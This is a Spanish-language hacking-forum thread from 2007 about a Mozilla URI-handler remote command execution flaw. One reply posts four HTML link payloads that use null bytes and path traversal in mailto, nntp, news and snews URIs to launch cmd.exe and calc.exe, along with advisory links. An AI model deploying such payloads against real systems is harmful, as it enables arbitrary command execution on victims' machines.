elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 12:05  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Mozilla Products Multiple URI Handlers Remote Command Execution Vulnerability		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Mozilla Products Multiple URI Handlers Remote Command Execution Vulnerability  (Leído 1,590 veces)
Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
Mozilla Products Multiple URI Handlers Remote Command Execution Vulnerability
« en: 30 Octubre 2007, 13:54 »
Mozilla Products Multiple URI Handlers Remote Command Execution Vulnerability
 
A vulnerability has been identified in Mozilla Firefox, SeaMonkey and Thunderbird, which could be exploited by attackers to take complete control of an affected system with MS Internet Explorer 7 installed.

¿alguien sabe algo de esto, no encontre mucho? algun PoC o algo? ah y sabe alguien que paso con milw0rm???? no me estoy pudiendo conectar
 :-\  :-\  :-\
 :huh: :huh: :huh:

 
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Mozilla Products Multiple URI Handlers Remote Command Execution Vulnerabilit
« Respuesta #1 en: 31 Octubre 2007, 15:36 »
Código
- <a href='mailto:%00%00../../../../../windows/system32/cmd".exe ../../../../../../windows/system32/calc.exe " - " blah.bat'>mailto</a> <br>
- <a href='nntp:%00%00../../../../../windows/system32/cmd".exe ../../../../../../windows/system32/calc.exe " - " blah.bat'>nntp</a> <br>
- <a href='news:%00%00../../../../../windows/system32/cmd".exe ../../../../../../windows/system32/calc.exe " - " blah.bat'>news</a> <br>
- <a href='snews:%00%00../../../../../windows/system32/cmd".exe ../../../../../../windows/system32/calc.exe " - " blah.bat'>snews</a> <br>

Más información:
https://bugzilla.mozilla.org/show_bug.cgi?id=389580
http://xs-sniper.com/blog/remote-command-exec-firefox-2005/
En línea
Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
Re: Mozilla Products Multiple URI Handlers Remote Command Execution Vulnerabilit
« Respuesta #2 en: 1 Noviembre 2007, 13:53 »
gracias yeikos
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines